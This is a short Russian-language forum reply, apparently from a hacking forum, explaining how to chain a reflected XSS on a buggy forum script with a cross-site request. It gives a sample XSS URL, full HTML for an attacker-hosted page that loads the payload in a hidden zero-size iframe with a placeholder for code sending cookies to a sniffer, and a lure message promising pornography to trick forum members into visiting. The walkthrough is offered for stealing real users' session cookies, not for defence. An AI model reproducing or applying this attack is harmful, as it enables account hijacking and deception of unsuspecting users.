ты видимо недопонял, что такое CSRF.
CSRF это межсайтовая имитация запроса пользователя к стороннему сайту, если пользователь в это время авторизован на стороннем сайте. Т.е. если я правильно понял, то ты нашел XSS на форуме, и в связке XSS и CSRF ты можешь сделать следующее:

Допустим http://forum/bug-script.php?tipic=1 это ссылка бажного форума.
Ты нашел там XSS и ссылка с ним выглядит допустим так:
http://forum/bug-script.php?tipic=><script>alert(document.coockie)</script>
Вот. Но это палевный вариант сувать такую ссылку пользователям.
Теперь ты на своем сайте допустим hack2009.narod.ru размещаешь в index.html такой код:
<html>
<title>ERROR</title>
<body>
<b>ERROR</b>
<iframe style="width:0px; height:0px; border: 0px"
src="http://forum/bug-script.php?tipic=><script>КОД_ПЕРЕДАЧИ_ СНИФЕРУ</script>"></iframe>
</body>
</html>
и пишешь на форуме в ЛС любому пользователю, мол "смотри тут преватное порно hack2009.narod.ru". Он переходит из ЛС на твой сайт и там выполняется CSRF+XSS. Куки твои. Молодец. Пять.

p.s. может где-то ошибся просто время уже 3:05 пиши сюда помогу чем могу